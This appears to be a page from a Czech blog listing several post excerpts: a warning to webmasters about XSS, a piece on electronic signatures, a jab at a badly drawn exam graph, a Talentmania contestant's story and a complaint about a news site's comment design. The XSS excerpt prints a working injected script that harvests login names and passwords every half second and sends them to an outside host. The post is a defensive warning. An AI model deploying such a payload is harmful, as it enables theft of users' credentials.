S XSS zranitelností se dá napáchat více škody, než si myslíte
Otázka pro webmastery: Víte, co dělá následující jQuery kód?
<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>
Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.
Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.
Elektronický podpis - vyplatí se vůbec?
Elektronický podpis se v poslední době velmi rozšířil a může vám ušetřit spoustu času s vyřizováním na úřadech. Je to tak nebo se jej nevyplatí pořizovat?
Za elektronický podpis se v širším významu dá považovat jakékoliv uvedení identifikačních údajů autora do elektronického dokumentu. Takovýto podpis samozřejmě není schopen zaručit ani integritu ani autenticitu podepsaného. Avšak velmi často se tímto pojmem myslí zaručený elektronický podpis. Takovýto podpis zajišťuje pomocí kryptografických metod a dohledu nezávislé třetí strany (certifikační autority) integritu a autenticitu dat. Tím je zajištěno, že odesílatelem zprávy je skutečně ten, kdo předpokládáme a také to, že zpráva nebyla během přenosu změněna.
Státní maturita z matematiky nakreslená v Malování?
Ze zvědavosti jsem nahlédl do oficiálních testů nanečisto nových maturit z matematiky.
Já, kdybych byl takto narýsovaná parabola, asi bych si uvázal smyčku a na ose x bych se oběsil. Nevím, kdo to na ministerstvu školství schvaloval, ale mě by za takový graf vyrazili i ze semestrální písemky...
Prosím, řekněte těm na ministerstvu, že v Malování je vlevo ikonka, kterou se dají dělat kolečka, nemusí to bastlit tužkou! A křivka tam udělat taky jde. Ať to má aspoň trochu úroveň, né? :-)
(Přímý odkaz na zdrojové PDF, kdyby mi někdo nevěřil)
Jak jsem "ukázal" talent v Talentmanii
Autorem tohoto textu je člověk, který chtěl zkusit štěstí v soutěži Talentmania. Ačkoli jde o reálný příběh, tak se kvůli obavám z pokuty 1.000 €, která mu hrozí za jakékoli hanění dobrého jména Talentmanie (součást smlouvy s TV Nova), rozhodl raději nepublikovat svoje jméno.
Nastal ten dlouho očekávaný den, na který jsem se systematicky připravoval. Cvičil jsem dlouhé hodiny, odkládal aktivity, které by šly přednostně před „fingerstyle hrou“ na kytaru a otravoval blízké a příbuzné repeticí kompletního repertoáru, kterým jsem chtěl oslnit porotu, předvést se a udělat show.
Kdo navrhoval prostředí diskuze na Novinky.cz?
Designer Programátor.
Který laik ví, co je tag? Kdo umí běžně napsat [ ]? Kolik procent lidí rozumí XML syntaxi? Kdo dokázal plynule přečíst předchozí 3 otázky?
Stránka: < 1 2 3 4 5 6 7 8 9 10 11 12 >
